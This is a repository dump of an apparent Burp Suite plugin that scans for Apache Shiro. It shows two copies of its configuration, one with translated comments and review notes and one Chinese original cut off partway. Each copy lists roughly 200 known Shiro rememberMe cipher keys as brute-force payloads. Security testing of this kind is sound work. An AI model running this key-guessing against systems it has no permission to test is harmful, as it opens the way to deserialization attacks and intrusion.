this.tagName; 63 | } 64 | 65 | @Override 66 | public Component getUiComponent() { 67 | return this.tabs; 68 | } 69 | } -------------------------------------------------------------------------------- /src/main/resources/config.yml: -------------------------------------------------------------------------------- 1 | # 插件启动项 2 | isStart: true 3 | 4 | # 消息等级 5 | # 用于插件扫描队列界面的显示 6 | # ALL = 显示所有消息 7 | # PIVOTAL = 只显示关键信息,只显示所有前缀带"[+]/[-]/[x]/[*]"的信息 8 | # 注: 乱输等于 PIVOTAL 9 | messageLevel: "PIVOTAL" 10 | 11 | # 扫描配置 12 | scan: 13 | # 站点扫描次数 14 | # 超过次数以后就不在对该站点进行扫描了 15 | # 0 表示无限次扫描 16 | siteScanNumber: 0 17 | # 域名扫描规则 18 | domainName: 19 | # 域名黑名单 20 | # 注: 黑名单优先级最高 21 | # 注: 为空表示关闭该功能 22 | # 使用规则: 23 | # 1. 过滤某个域名: www.domain1.com 24 | # 2. 过滤某个域名的全部子域名: *.domain2.com 25 | # 3. 
过滤某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com 26 | # Usage: 27 | # blacklist: 28 | # - "www.domain1.com" 29 | # - "*.domain2.com" 30 | blacklist: 31 | - "*.dnslog.cn" 32 | - "*.ceye.io" 33 | - "*.fofa.so" 34 | - "*.shodan.io" 35 | - "*.github.com" 36 | - "*.fofa.info" 37 | - "*.nosec.org" 38 | # Domain whitelist 39 | # Note: the blacklist has the highest priority 40 | # Note: an empty list turns this feature off. NOTE(review): presumably every host not on the blacklist is then eligible for scanning, so list the hosts under test here to restrict it - confirm against the matching code 41 | # Rules: 42 | # 1. Scan only one domain: www.domain1.com 43 | # 2. Scan only all subdomains of a domain: *.domain2.com 44 | # 3. Scan only some subdomains of a domain: a.*.domain2.com/*.a.*.domain2.com 45 | # Usage: 46 | # whitelist: 47 | # - "www.domain1.com" 48 | # - "*.domain2.com" 49 | whitelist: 50 | 51 | # URL suffix blacklist 52 | # URLs whose suffix matches one of these entries are not tested 53 | urlBlackListSuffix: 54 | config: 55 | isStart: true 56 | suffixList: 57 | - "3g2" 58 | - "3gp" 59 | - "7z" 60 | - "aac" 61 | - "abw" 62 | - "aif" 63 | - "aifc" 64 | - "aiff" 65 | - "arc" 66 | - "au" 67 | - "avi" 68 | - "azw" 69 | - "bin" 70 | - "bmp" 71 | - "bz" 72 | - "bz2" 73 | - "cmx" 74 | - "cod" 75 | - "csh" 76 | - "css" 77 | - "csv" 78 | - "doc" 79 | - "docx" 80 | - "eot" 81 | - "epub" 82 | - "gif" 83 | - "gz" 84 | - "ico" 85 | - "ics" 86 | - "ief" 87 | - "jar" 88 | - "jfif" 89 | - "jpe" 90 | - "jpeg" 91 | - "jpg" 92 | - "m3u" 93 | - "mid" 94 | - "midi" 95 | - "mjs" 96 | - "mp2" 97 | - "mp3" 98 | - "mpa" 99 | - "mpe" 100 | - "mpeg" 101 | - "mpg" 102 | - "mpkg" 103 | - "mpp" 104 | - "mpv2" 105 | - "odp" 106 | - "ods" 107 | - "odt" 108 | - "oga" 109 | - "ogv" 110 | - "ogx" 111 | - "otf" 112 | - "pbm" 113 | - "pdf" 114 | - "pgm" 115 | - "png" 116 | - "pnm" 117 | - "ppm" 118 | - "ppt" 119 | - "pptx" 120 | - "ra" 121 | - "ram" 122 | - "rar" 123 | - "ras" 124 | - "rgb" 125 | - "rmi" 126 | - "rtf" 127 | - "snd" 128 | - "svg" 129 | - "swf" 130 | - "tar" 131 | - "tif" 132 | - "tiff" 133 | - "ttf" 134 | - "vsd" 135 | - "wav" 136 | - "weba" 137 | - "webm" 138 | - "webp" 139 | - "woff" 140 | - "woff2" 141 | - "xbm" 142 | - "xls" 143 | - "xlsx" 144 | - "xpm" 145 | - "xul" 146 | - "xwd" 147 | - "zip" 148 | - "js" 149 | - "wmv" 150 | - "asf" 151 
| - "asx" 152 | - "rm" 153 | - "rmvb" 154 | - "mp4" 155 | - "mov" 156 | - "m4v" 157 | - "dat" 158 | - "mkv" 159 | - "flv" 160 | - "vob" 161 | - "txt" 162 | - "php" 163 | - "asp" 164 | 165 | # Application configuration 166 | application: 167 | # Shiro fingerprint extension 168 | shiroFingerprintExtension: 169 | config: 170 | # Number of Shiro fingerprint issues 171 | # How many issues may be recorded for the same site 172 | # Once the count is exceeded the site is no longer scanned 173 | # 0 means no limit 174 | issueNumber: 3 175 | # Issue name 176 | issueName: "ShiroFramework" 177 | # Shiro cipher-key extension 178 | shiroCipherKeyExtension: 179 | config: 180 | # Start switch for this extension 181 | isStart: true 182 | # Whether to scan for the issue with CBC encryption 183 | isScanCbcEncrypt: true 184 | # Whether to scan for the issue with GCM encryption 185 | isScanGcmEncrypt: true 186 | # Number of Shiro cipher-key leak issues 187 | # How many issues may be recorded for the same site 188 | # Once the count is exceeded the site is no longer scanned 189 | # 0 means no limit 190 | issueNumber: 1 191 | # Maximum total number of threads the program runs 192 | # The minimum is 1; a value less than or equal to 0 is reset to 1 193 | # Note: 194 | # Threads are started dynamically according to the total number of Shiro cipher keys supplied 195 | # A value of 4 means that at most 4 threads may be started to run the tasks 196 | threadTotal: 4 197 | # Similarity ratio 198 | # 1 = 100%, 0.7 = 70% 199 | # Threshold used when the key-test request is compared with the original request and with a request made using a key that is certain to be wrong; a similarity below it is treated as the issue not being present 200 | # For example: 201 | # key-test request vs. original request: similarity below 0.7 means the issue is considered absent 202 | # key-test request vs. certain-wrong-key request: similarity below 0.7 means the issue is considered absent 203 | similarityRatio: 0.7 204 | # Provider 205 | # Names the class in Application.ShiroCipherKeyExtension.ExtensionMethod that serves this extension 206 | provider: "ShiroCipherKeyScan" 207 | # Issue name 208 | issueName: "ShiroCipherKey" 209 | payloads: # NOTE(review): presumably the candidate Shiro cipher keys the scan tries; a deployment whose configured key appears in this list should replace it with a freshly generated random key 210 | - "kPH+bIxk5D2deZiIxcaaaA==" 211 | - "Z3VucwAAAAAAAAAAAAAAAA==" 212 | - "wGiHplamyXlVB11UXWol8g==" 213 | - "2AvVhdsgUs0FSA3SDFAdag==" 214 | - "3AvVhmFLUs0KTA3Kprsdag==" 215 | - "4AvVhmFLUs0KTA3Kprsdag==" 216 | - "bWljcm9zAAAAAAAAAAAAAA==" 217 | - "WcfHGU25gNnTxTlmJMeSpw==" 218 | - "fCq+/xW488hMTCD+cmJ3aQ==" 219 | - "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN" 220 | - "6ZmI6I2j5Y+R5aSn5ZOlAA==" 221 | - "1QWLxg+NYmxraMoxAXu/Iw==" 222 | - "a2VlcE9uR29pbmdBbmRGaQ==" 223 | - "5aaC5qKm5oqA5pyvAAAAAA==" 224 | - "1AvVhdsgUs0FSA3SDFAdag==" 225 | - "5RC7uBZLkByfFfJm22q/Zw==" 226 | - "3AvVhdAgUs0FSA4SDFAdBg==" 227 | - "a3dvbmcAAAAAAAAAAAAAAA==" 228 
| - "eXNmAAAAAAAAAAAAAAAAAA==" 229 | - "U0hGX2d1bnMAAAAAAAAAAA==" 230 | - "Ymx1ZXdoYWxlAAAAAAAAAA==" 231 | - "L7RioUULEFhRyxM7a2R/Yg==" 232 | - "UGlzMjAxNiVLeUVlXiEjLw==" 233 | - "bWluZS1hc3NldC1rZXk6QQ==" 234 | - "ZUdsaGJuSmxibVI2ZHc9PQ==" 235 | - "7AvVhmFLUs0KTA3Kprsdag==" 236 | - "MTIzNDU2Nzg5MGFiY2RlZg==" 237 | - "OY//C4rhfwNxCQAQCrQQ1Q==" 238 | - "bTBANVpaOUw0ampRWG43TVJFcF5iXjdJ" 239 | - "FP7qKJzdJOGkzoQzo2wTmA==" 240 | - "nhNhwZ6X7xzgXnnZBxWFQLwCGQtJojL3" 241 | - "LEGEND-CAMPUS-CIPHERKEY==" 242 | - "r0e3c16IdVkouZgk1TKVMg==" 243 | - "ZWvohmPdUsAWT3=KpPqda" 244 | - "k3+XHEg6D8tb2mGm7VJ3nQ==" 245 | - "U3ByaW5nQmxhZGUAAAAAAA==" 246 | - "tiVV6g3uZBGfgshesAQbjA==" 247 | - "ZAvph3dsQs0FSL3SDFAdag==" 248 | - "0AvVhmFLUs0KTA3Kprsdag==" 249 | - "25BsmdYwjnfcWmnhAciDDg==" 250 | - "3JvYhmBLUs0ETA5Kprsdag==" 251 | - "5AvVhmFLUs0KTA3Kprsdag==" 252 | - "6AvVhmFLUs0KTA3Kprsdag==" 253 | - "6NfXkC7YVCV5DASIrEm1Rg==" 254 | - "cmVtZW1iZXJNZQAAAAAAAA==" 255 | - "8AvVhmFLUs0KTA3Kprsdag==" 256 | - "8BvVhmFLUs0KTA3Kprsdag==" 257 | - "9AvVhmFLUs0KTA3Kprsdag==" 258 | - "OUHYQzxQ/W9e/UjiAGu6rg==" 259 | - "aU1pcmFjbGVpTWlyYWNsZQ==" 260 | - "bXRvbnMAAAAAAAAAAAAAAA==" 261 | - "5J7bIJIV0LQSN3c9LPitBQ==" 262 | - "bya2HkYo57u6fWh5theAWw==" 263 | - "f/SY5TIve5WWzT4aQlABJA==" 264 | - "WuB+y2gcHRnY2Lg9+Aqmqg==" 265 | - "3qDVdLawoIr1xFd6ietnwg==" 266 | - "YI1+nBV//m7ELrIyDHm6DQ==" 267 | - "6Zm+6I2j5Y+R5aS+5ZOlAA==" 268 | - "2A2V+RFLUs+eTA3Kpr+dag==" 269 | - "6ZmI6I2j3Y+R1aSn5BOlAA==" 270 | - "SkZpbmFsQmxhZGUAAAAAAA==" 271 | - "2cVtiE83c4lIrELJwKGJUw==" 272 | - "fsHspZw/92PrS3XrPW+vxw==" 273 | - "XTx6CKLo/SdSgub+OPHSrw==" 274 | - "sHdIjUN6tzhl8xZMG3ULCQ==" 275 | - "O4pdf+7e+mZe8NyxMTPJmQ==" 276 | - "HWrBltGvEZc14h9VpMvZWw==" 277 | - "rPNqM6uKFCyaL10AK51UkQ==" 278 | - "Y1JxNSPXVwMkyvES/kJGeQ==" 279 | - "lT2UvDUmQwewm6mMoiw4Ig==" 280 | - "MPdCMZ9urzEA50JDlDYYDg==" 281 | - "xVmmoltfpb8tTceuT5R7Bw==" 282 | - "c+3hFGPjbgzGdrC+MHgoRQ==" 283 | - "ClLk69oNcA3m+s0jIMIkpg==" 284 | - 
"Bf7MfkNR0axGGptozrebag==" 285 | - "1tC/xrDYs8ey+sa3emtiYw==" 286 | - "ZmFsYWRvLnh5ei5zaGlybw==" 287 | - "cGhyYWNrY3RmREUhfiMkZA==" 288 | - "IduElDUpDDXE677ZkhhKnQ==" 289 | - "yeAAo1E8BOeAYfBlm4NG9Q==" 290 | - "cGljYXMAAAAAAAAAAAAAAA==" 291 | - "2itfW92XazYRi5ltW0M2yA==" 292 | - "XgGkgqGqYrix9lI6vxcrRw==" 293 | - "ertVhmFLUs0KTA3Kprsdag==" 294 | - "5AvVhmFLUS0ATA4Kprsdag==" 295 | - "s0KTA3mFLUprK4AvVhsdag==" 296 | - "hBlzKg78ajaZuTE0VLzDDg==" 297 | - "9FvVhtFLUs0KnA3Kprsdyg==" 298 | - "d2ViUmVtZW1iZXJNZUtleQ==" 299 | - "yNeUgSzL/CfiWw1GALg6Ag==" 300 | - "NGk/3cQ6F5/UNPRh8LpMIg==" 301 | - "4BvVhmFLUs0KTA3Kprsdag==" 302 | - "MzVeSkYyWTI2OFVLZjRzZg==" 303 | - "CrownKey==a12d/dakdad" 304 | - "empodDEyMwAAAAAAAAAAAA==" 305 | - "A7UzJgh1+EWj5oBFi+mSgw==" 306 | - "c2hpcm9fYmF0aXMzMgAAAA==" 307 | - "i45FVt72K2kLgvFrJtoZRw==" 308 | - "66v1O8keKNV3TTcGPK1wzg==" 309 | - "U3BAbW5nQmxhZGUAAAAAAA==" 310 | - "ZnJlc2h6Y24xMjM0NTY3OA==" 311 | - "Jt3C93kMR9D5e8QzwfsiMw==" 312 | - "MTIzNDU2NzgxMjM0NTY3OA==" 313 | - "vXP33AonIp9bFwGl7aT7rA==" 314 | - "V2hhdCBUaGUgSGVsbAAAAA==" 315 | - "Q01TX0JGTFlLRVlfMjAxOQ==" 316 | - "Is9zJ3pzNh2cgTHB4ua3+Q==" 317 | - "SDKOLKn2J1j/2BHjeZwAoQ==" 318 | - "NsZXjXVklWPZwOfkvk6kUA==" 319 | - "GAevYnznvgNCURavBhCr1w==" 320 | - "zSyK5Kp6PZAAjlT+eeNMlg==" 321 | - "bXdrXl9eNjY2KjA3Z2otPQ==" 322 | - "RVZBTk5JR0hUTFlfV0FPVQ==" 323 | - "WkhBTkdYSUFPSEVJX0NBVA==" 324 | - "GsHaWo4m1eNbE0kNSMULhg==" 325 | - "l8cc6d2xpkT1yFtLIcLHCg==" 326 | - "KU471rVNQ6k7PQL4SqxgJg==" 327 | - "kPH+bIxk5D2deZiIxcabaA==" 328 | - "kPH+bIxk5D2deZiIxcacaA==" 329 | - "4AvVhdsgUs0F563SDFAdag==" 330 | - "FL9HL9Yu5bVUJ0PDU1ySvg==" 331 | - "fdCEiK9YvLC668sS43CJ6A==" 332 | - "FJoQCiz0z5XWz2N2LyxNww==" 333 | - "HeUZ/LvgkO7nsa18ZyVxWQ==" 334 | - "HoTP07fJPKIRLOWoVXmv+Q==" 335 | - "iycgIIyCatQofd0XXxbzEg==" 336 | - "m0/5ZZ9L4jjQXn7MREr/bw==" 337 | - "NoIw91X9GSiCrLCF03ZGZw==" 338 | - "oPH+bIxk5E2enZiIxcqaaA==" 339 | - "QAk0rp8sG0uJC4Ke2baYNA==" 340 | - "Rb5RN+LofDWJlzWAwsXzxg==" 341 | - 
"s2SE9y32PvLeYo+VGFpcKA==" 342 | - "SrpFBcVD89eTQ2icOD0TMg==" 343 | - "Us0KvVhTeasAm43KFLAeng==" 344 | - "YWJjZGRjYmFhYmNkZGNiYQ==" 345 | - "zIiHplamyXlVB11UXWol8g==" 346 | - "ZjQyMTJiNTJhZGZmYjFjMQ==" 347 | - "2adsfasdqerqerqewradsf==" 348 | - "2AvVCXsxUs0FSA7SYFjdQg==" 349 | - "2AvVhdsgERdsSA3SDFAdag==" 350 | - "2AvVhdsgUs0FSA3SaFAdfg==" 351 | - "2AvVhdsgUs0FSA3SDFAder==" 352 | - "2AvVhdsgUsOFSA3SDFAdag==" 353 | - "2AvVhmFLUs0KTA3Kprsdag==" 354 | - "2AvVidsaUSofSA3SDFAdog==" 355 | - "3Av2hmFLAs0BTA3Kprsd6E==" 356 | - "3AvVhdAgUs1FSA4SDFAdBg==" 357 | - "3AvVhMFLIs0KTA3Kprsdag==" 358 | - "3AvVhmFLUs0KTA3KaTHGFg==" 359 | - "3qDVdLawoIr1xFd6ietnsg==" 360 | - "3rvVhmFLUs0KAT3Kprsdag==" 361 | - "4AvVhm2LUs0KTA3Kprsdag==" 362 | - "4AvVhmFLUs0KTA3KAAAAAA==" 363 | - "4AvVhmFLUs0KTA3Kprseaf==" 364 | - "4AvVhmFLUs0TTA3Kprsdag==" 365 | - "4AvVhmFLUs5KTA1Kprsdag==" 366 | - "4AvVhmFLUsOKTA3Kprsdag==" 367 | - "4rvVhmFLUs0KAT3Kprsdag==" 368 | - "4WCZSJyqdUQsije93aQIRg==" 369 | - "5AvVhCsgUs0FSA3SDFAdag==" 370 | - "5oiR5piv5p2h5ZK46bG8IQ==" 371 | - "8AvVhdsgUs0FSA3SDFAdag==" 372 | - "9Ami6v2G5Y+r5aPnE4OlBB==" 373 | - "9AVvhnFLuS3KTV8KprsdAg==" 374 | - "AF05JAuyuEB1ouJQ9Y9Phg==" 375 | - "aG91c2Vob3VzZWhvdXNlMg==" 376 | - "A+kWR7o9O0/G/W6aOGesRA==" 377 | - "AztiX2RUqhc7dhOzl1Mj8Q==" 378 | - "b2EAAAAAAAAAAAAAAAAAAA==" 379 | - "B9rPF8FHhxKJZ9k63ik7kQ==" 380 | - "c2hvdWtlLXBsdXMuMjAxNg==" 381 | - "Cj6LnKZNLEowAZrdqyH/Ew==" 382 | - "duhfin37x6chw29jsne45m==" 383 | - "fCq+/xW488hMTCE+cmJ3FF==" 384 | - "FjbNm1avvGmWE9CY2HqV75==" 385 | - "GhrF5zLfq1Dtadd1jlohhA==" 386 | - "GHxH6G3LFh8Zb3NwoRgfFA==" 387 | - "HOlg7NHb9potm0n5s4ic0Q==" 388 | - "lt181dcQVz/Bo9Wb8ws/Cg==" 389 | - "M2djA70UBBUPDibGZBRvrA==" 390 | - "mIccZhQt6EBHrZIyw1FAXQ==" 391 | - "pbnA+Qzen1vjV3rNqQBLHg==" 392 | - "pyyX1c5x2f0LZZ7VKZXjKO==" 393 | - "QDFCnfkLUs0KTA3Kprsdag==" 394 | - "QF5HMyZAWDZYRyFnSGhTdQ==" 395 | - "qQFtSnnj/sx7vu51ixAyEQ==" 396 | - "QUxQSEFNWVNPRlRCVUlMRA==" 397 | - "QVN1bm5uJ3MgU3Vuc2l0ZQ==" 398 | - 
"R29yZG9uV2ViAAAAAAAAAA==" 399 | - "sBv2t3okbdm3U0r2EVcSzB==" 400 | - "sgIQrqUVxa1OZRRIK3hLZw==" 401 | - "TGMPe7lGO/Gbr38QiJu1/w==" 402 | - "w793pPq5ZVBKkj8OhV4KaQ==" 403 | - "wrjUh2ttBPQLnT4JVhriug==" 404 | - "wyLZMDifwq3sW1vhhHpgKA==" 405 | - "YnlhdnMAAAAAAAAAAAAAAA==" 406 | - "YVd4dmRtVjViM1UlM0QIdn==" 407 | - "YWdlbnRAZG1AMjAxOHN3Zg==" 408 | - "YystomRZLMUjiK0Q1+LFdw==" 409 | - "Z3VucwAAAAAAAAAAAAABBB==" 410 | - "Z3VucwACAOVAKALACAADSA==" -------------------------------------------------------------------------------- /target/BurpShiroPassiveScan-2.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/BurpShiroPassiveScan-2.0.0.jar -------------------------------------------------------------------------------- /target/BurpShiroPassiveScan.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/BurpShiroPassiveScan.rar -------------------------------------------------------------------------------- /target/BurpShiroPassiveScan/BurpShiroPassiveScan.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/BurpShiroPassiveScan/BurpShiroPassiveScan.jar -------------------------------------------------------------------------------- /target/BurpShiroPassiveScan/resources/config.yml: -------------------------------------------------------------------------------- 1 | # 插件启动项 2 | isStart: true 3 | 4 | # 消息等级 5 | # 用于插件扫描队列界面的显示 6 | # ALL = 显示所有消息 7 | # PIVOTAL = 只显示关键信息,只显示所有前缀带"[+]/[-]/[x]/[*]"的信息 8 | # 注: 乱输等于 PIVOTAL 9 | messageLevel: "PIVOTAL" 10 | 11 | # 扫描配置 12 | scan: 13 | # 站点扫描次数 14 | # 超过次数以后就不在对该站点进行扫描了 15 | # 0 表示无限次扫描 16 | siteScanNumber: 0 17 | # 域名扫描规则 18 | domainName: 19 
| # 域名黑名单 20 | # 注: 黑名单优先级最高 21 | # 注: 为空表示关闭该功能 22 | # 使用规则: 23 | # 1. 过滤某个域名: www.domain1.com 24 | # 2. 过滤某个域名的全部子域名: *.domain2.com 25 | # 3. 过滤某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com 26 | # 使用方法: 27 | # blacklist: 28 | # - "www.domain1.com" 29 | # - "*.domain2.com" 30 | blacklist: 31 | - "*.dnslog.cn" 32 | - "*.ceye.io" 33 | - "*.fofa.so" 34 | - "*.shodan.io" 35 | - "*.github.com" 36 | - "*.fofa.info" 37 | - "*.nosec.org" 38 | # 域名白名单 39 | # 注: 黑名单优先级最高 40 | # 注: 为空表示关闭该功能 41 | # 使用规则: 42 | # 1. 只扫描某个域名: www.domain1.com 43 | # 2. 只扫描某个域名的全部子域名: *.domain2.com 44 | # 3. 只扫描某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com 45 | # 使用方法: 46 | # whitelist: 47 | # - "www.domain1.com" 48 | # - "*.domain2.com" 49 | whitelist: 50 | 51 | # url黑名单后缀 52 | # url的后缀出现这些字段的都不进行测试 53 | urlBlackListSuffix: 54 | config: 55 | isStart: true 56 | suffixList: 57 | - "3g2" 58 | - "3gp" 59 | - "7z" 60 | - "aac" 61 | - "abw" 62 | - "aif" 63 | - "aifc" 64 | - "aiff" 65 | - "arc" 66 | - "au" 67 | - "avi" 68 | - "azw" 69 | - "bin" 70 | - "bmp" 71 | - "bz" 72 | - "bz2" 73 | - "cmx" 74 | - "cod" 75 | - "csh" 76 | - "css" 77 | - "csv" 78 | - "doc" 79 | - "docx" 80 | - "eot" 81 | - "epub" 82 | - "gif" 83 | - "gz" 84 | - "ico" 85 | - "ics" 86 | - "ief" 87 | - "jar" 88 | - "jfif" 89 | - "jpe" 90 | - "jpeg" 91 | - "jpg" 92 | - "m3u" 93 | - "mid" 94 | - "midi" 95 | - "mjs" 96 | - "mp2" 97 | - "mp3" 98 | - "mpa" 99 | - "mpe" 100 | - "mpeg" 101 | - "mpg" 102 | - "mpkg" 103 | - "mpp" 104 | - "mpv2" 105 | - "odp" 106 | - "ods" 107 | - "odt" 108 | - "oga" 109 | - "ogv" 110 | - "ogx" 111 | - "otf" 112 | - "pbm" 113 | - "pdf" 114 | - "pgm" 115 | - "png" 116 | - "pnm" 117 | - "ppm" 118 | - "ppt" 119 | - "pptx" 120 | - "ra" 121 | - "ram" 122 | - "rar" 123 | - "ras" 124 | - "rgb" 125 | - "rmi" 126 | - "rtf" 127 | - "snd" 128 | - "svg" 129 | - "swf" 130 | - "tar" 131 | - "tif" 132 | - "tiff" 133 | - "ttf" 134 | - "vsd" 135 | - "wav" 136 | - "weba" 137 | - "webm" 138 | - "webp" 139 | - "woff" 140 | - "woff2" 
141 | - "xbm" 142 | - "xls" 143 | - "xlsx" 144 | - "xpm" 145 | - "xul" 146 | - "xwd" 147 | - "zip" 148 | - "js" 149 | - "wmv" 150 | - "asf" 151 | - "asx" 152 | - "rm" 153 | - "rmvb" 154 | - "mp4" 155 | - "mov" 156 | - "m4v" 157 | - "dat" 158 | - "mkv" 159 | - "flv" 160 | - "vob" 161 | - "txt" 162 | - "php" 163 | - "asp" 164 | 165 | # 应用程序配置 166 | application: 167 | # shiro指纹扩展 168 | shiroFingerprintExtension: 169 | config: 170 | # shiro指纹问题数量 171 | # 表示可以接收同一个站点多少个问题个数 172 | # 超过次数以后就不在对该站点进行扫描了 173 | # 0 表示无限次接收 174 | issueNumber: 3 175 | # 问题名称 176 | issueName: "ShiroFramework" 177 | # shiro加密key扩展 178 | shiroCipherKeyExtension: 179 | config: 180 | # 插件启动项 181 | isStart: true 182 | # 用于判断是否扫描Cbc加密的问题 183 | isScanCbcEncrypt: true 184 | # 用于判断是否扫描Gcm加密的问题 185 | isScanGcmEncrypt: true 186 | # shiro加密key泄漏问题数量 187 | # 表示可以接收同一个站点多少个问题个数 188 | # 超过次数以后就不在对该站点进行扫描了 189 | # 0 表示无限次接收 190 | issueNumber: 1 191 | # 程序运行的最大线程总数 192 | # 最小值为1, 小于等于0, 会重置为1 193 | # 注意: 194 | # 会自动根据输入的shiro加密key总数,来动态启动线程执行任务 195 | # 设置4的话,意思是最多可以开几个线程来执行任务的意思 196 | threadTotal: 4 197 | # 相似度比例 198 | # 1 = 100%, 0.7 = 70% 199 | # 主要用来 shiro跑key请求 对比 原请求 与 必定错误key请求相似度 低于多少会被认为不存在该问题 200 | # 例如: 201 | # shiro跑key请求 与 原请求 相似度低于0.7则认为不存在该问题 202 | # shiro跑key请求 与 必定错误key请求相似度 相似度低于0.7则认为不存在该问题 203 | similarityRatio: 0.7 204 | # 提供商 205 | # 声明使用 Application.ShiroCipherKeyExtension.ExtensionMethod 的哪个类,为该扩展提供服务 206 | provider: "ShiroCipherKeyScan" 207 | # 问题名称 208 | issueName: "ShiroCipherKey" 209 | payloads: 210 | - "kPH+bIxk5D2deZiIxcaaaA==" 211 | - "Z3VucwAAAAAAAAAAAAAAAA==" 212 | - "wGiHplamyXlVB11UXWol8g==" 213 | - "2AvVhdsgUs0FSA3SDFAdag==" 214 | - "3AvVhmFLUs0KTA3Kprsdag==" 215 | - "4AvVhmFLUs0KTA3Kprsdag==" 216 | - "bWljcm9zAAAAAAAAAAAAAA==" 217 | - "WcfHGU25gNnTxTlmJMeSpw==" 218 | - "fCq+/xW488hMTCD+cmJ3aQ==" 219 | - "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN" 220 | - "6ZmI6I2j5Y+R5aSn5ZOlAA==" 221 | - "1QWLxg+NYmxraMoxAXu/Iw==" 222 | - "a2VlcE9uR29pbmdBbmRGaQ==" 223 | - "5aaC5qKm5oqA5pyvAAAAAA==" 
224 | - "1AvVhdsgUs0FSA3SDFAdag==" 225 | - "5RC7uBZLkByfFfJm22q/Zw==" 226 | - "3AvVhdAgUs0FSA4SDFAdBg==" 227 | - "a3dvbmcAAAAAAAAAAAAAAA==" 228 | - "eXNmAAAAAAAAAAAAAAAAAA==" 229 | - "U0hGX2d1bnMAAAAAAAAAAA==" 230 | - "Ymx1ZXdoYWxlAAAAAAAAAA==" 231 | - "L7RioUULEFhRyxM7a2R/Yg==" 232 | - "UGlzMjAxNiVLeUVlXiEjLw==" 233 | - "bWluZS1hc3NldC1rZXk6QQ==" 234 | - "ZUdsaGJuSmxibVI2ZHc9PQ==" 235 | - "7AvVhmFLUs0KTA3Kprsdag==" 236 | - "MTIzNDU2Nzg5MGFiY2RlZg==" 237 | - "OY//C4rhfwNxCQAQCrQQ1Q==" 238 | - "bTBANVpaOUw0ampRWG43TVJFcF5iXjdJ" 239 | - "FP7qKJzdJOGkzoQzo2wTmA==" 240 | - "nhNhwZ6X7xzgXnnZBxWFQLwCGQtJojL3" 241 | - "LEGEND-CAMPUS-CIPHERKEY==" 242 | - "r0e3c16IdVkouZgk1TKVMg==" 243 | - "ZWvohmPdUsAWT3=KpPqda" 244 | - "k3+XHEg6D8tb2mGm7VJ3nQ==" 245 | - "U3ByaW5nQmxhZGUAAAAAAA==" 246 | - "tiVV6g3uZBGfgshesAQbjA==" 247 | - "ZAvph3dsQs0FSL3SDFAdag==" 248 | - "0AvVhmFLUs0KTA3Kprsdag==" 249 | - "25BsmdYwjnfcWmnhAciDDg==" 250 | - "3JvYhmBLUs0ETA5Kprsdag==" 251 | - "5AvVhmFLUs0KTA3Kprsdag==" 252 | - "6AvVhmFLUs0KTA3Kprsdag==" 253 | - "6NfXkC7YVCV5DASIrEm1Rg==" 254 | - "cmVtZW1iZXJNZQAAAAAAAA==" 255 | - "8AvVhmFLUs0KTA3Kprsdag==" 256 | - "8BvVhmFLUs0KTA3Kprsdag==" 257 | - "9AvVhmFLUs0KTA3Kprsdag==" 258 | - "OUHYQzxQ/W9e/UjiAGu6rg==" 259 | - "aU1pcmFjbGVpTWlyYWNsZQ==" 260 | - "bXRvbnMAAAAAAAAAAAAAAA==" 261 | - "5J7bIJIV0LQSN3c9LPitBQ==" 262 | - "bya2HkYo57u6fWh5theAWw==" 263 | - "f/SY5TIve5WWzT4aQlABJA==" 264 | - "WuB+y2gcHRnY2Lg9+Aqmqg==" 265 | - "3qDVdLawoIr1xFd6ietnwg==" 266 | - "YI1+nBV//m7ELrIyDHm6DQ==" 267 | - "6Zm+6I2j5Y+R5aS+5ZOlAA==" 268 | - "2A2V+RFLUs+eTA3Kpr+dag==" 269 | - "6ZmI6I2j3Y+R1aSn5BOlAA==" 270 | - "SkZpbmFsQmxhZGUAAAAAAA==" 271 | - "2cVtiE83c4lIrELJwKGJUw==" 272 | - "fsHspZw/92PrS3XrPW+vxw==" 273 | - "XTx6CKLo/SdSgub+OPHSrw==" 274 | - "sHdIjUN6tzhl8xZMG3ULCQ==" 275 | - "O4pdf+7e+mZe8NyxMTPJmQ==" 276 | - "HWrBltGvEZc14h9VpMvZWw==" 277 | - "rPNqM6uKFCyaL10AK51UkQ==" 278 | - "Y1JxNSPXVwMkyvES/kJGeQ==" 279 | - "lT2UvDUmQwewm6mMoiw4Ig==" 280 | - 
"MPdCMZ9urzEA50JDlDYYDg==" 281 | - "xVmmoltfpb8tTceuT5R7Bw==" 282 | - "c+3hFGPjbgzGdrC+MHgoRQ==" 283 | - "ClLk69oNcA3m+s0jIMIkpg==" 284 | - "Bf7MfkNR0axGGptozrebag==" 285 | - "1tC/xrDYs8ey+sa3emtiYw==" 286 | - "ZmFsYWRvLnh5ei5zaGlybw==" 287 | - "cGhyYWNrY3RmREUhfiMkZA==" 288 | - "IduElDUpDDXE677ZkhhKnQ==" 289 | - "yeAAo1E8BOeAYfBlm4NG9Q==" 290 | - "cGljYXMAAAAAAAAAAAAAAA==" 291 | - "2itfW92XazYRi5ltW0M2yA==" 292 | - "XgGkgqGqYrix9lI6vxcrRw==" 293 | - "ertVhmFLUs0KTA3Kprsdag==" 294 | - "5AvVhmFLUS0ATA4Kprsdag==" 295 | - "s0KTA3mFLUprK4AvVhsdag==" 296 | - "hBlzKg78ajaZuTE0VLzDDg==" 297 | - "9FvVhtFLUs0KnA3Kprsdyg==" 298 | - "d2ViUmVtZW1iZXJNZUtleQ==" 299 | - "yNeUgSzL/CfiWw1GALg6Ag==" 300 | - "NGk/3cQ6F5/UNPRh8LpMIg==" 301 | - "4BvVhmFLUs0KTA3Kprsdag==" 302 | - "MzVeSkYyWTI2OFVLZjRzZg==" 303 | - "CrownKey==a12d/dakdad" 304 | - "empodDEyMwAAAAAAAAAAAA==" 305 | - "A7UzJgh1+EWj5oBFi+mSgw==" 306 | - "c2hpcm9fYmF0aXMzMgAAAA==" 307 | - "i45FVt72K2kLgvFrJtoZRw==" 308 | - "66v1O8keKNV3TTcGPK1wzg==" 309 | - 